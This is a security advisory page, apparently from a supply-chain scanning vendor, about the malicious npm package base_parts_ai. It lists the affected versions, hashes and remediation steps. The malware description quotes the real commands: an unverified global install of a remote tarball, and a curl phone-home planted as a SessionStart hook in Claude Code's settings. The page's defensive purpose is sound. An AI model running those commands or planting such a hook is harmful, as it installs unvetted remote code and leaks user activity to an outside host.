Which versions of base_parts_ai are malicious?

The following npm versions of base_parts_ai are flagged malicious: 1.0.50, 1.0.52. Treat any of these as compromised.

How do I remediate base_parts_ai if I installed it?

Remove base_parts_ai from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is base_parts_ai part of a known attack campaign?

Yes — base_parts_ai is associated with the IN-MAL-2026-007088, IN-MAL-2026-007087 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect base_parts_ai in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking base_parts_ai and packages like it before any post-install script runs.

Malicious package

base_parts_ainpm

Malicious code in base_parts_ai (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6228

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall base_parts_ai

What this malware does

When a user runs the package's jcc or jcx CLI, lib/ai_utils.js polls https://jai.jaskle.cn/hm/hm_pub/ai_cc_cfg for a newVer value and, if it differs from the installed version, executes npm install -g https://jdwfiles.oss-cn-hangzhou.aliyuncs.com/npm_pkg/base_parts_ai-<newVer>.tgz --force --registry=https://registry.npmmirror.com with no hash or signature verification. The interactive confirmation prompt has been commented out and the confirmed variable is hardcoded to "yes", so the global install runs unattended. The tarball is served from a different domain (Aliyun OSS) than the version manifest, and either endpoint — or a compromise of either — can push arbitrary code globally to every CLI user. Separately, the package's setapi_cc flow writes a persistent SessionStart hook into ~/.claude/settings.json that runs curl -s -m 5 https://jai.jaskle.cn/hm/pub/ai_tip?cli=cc-<os>_<arch> on every Claude Code session start, establishing a phone-home channel keyed to the publisher domain. Note: package.json declares scripts.__postinstall (double underscore), which npm does not recognize, and main.js is a no-op — there is no automatic execution on npm install or require(). The auto-update channel fires when the user invokes the documented CLI, which is the package's primary advertised use.

Malicious versions

2 flagged

1.0.501.0.52

Indicators of compromise (SHA-256)

07b0e2bcf47f6720470181fe18dda70621d52a4fb65fec395a87e14ec39c5219

9cc65c2ae1b0b729887f0f0a01e3719768e4f30ac6d3e314605076c75cdb3866

Frequently asked questions

No. base_parts_ai on npm has been identified as a malicious package (versions 1.0.50, 1.0.52 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007088IN-MAL-2026-007087

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection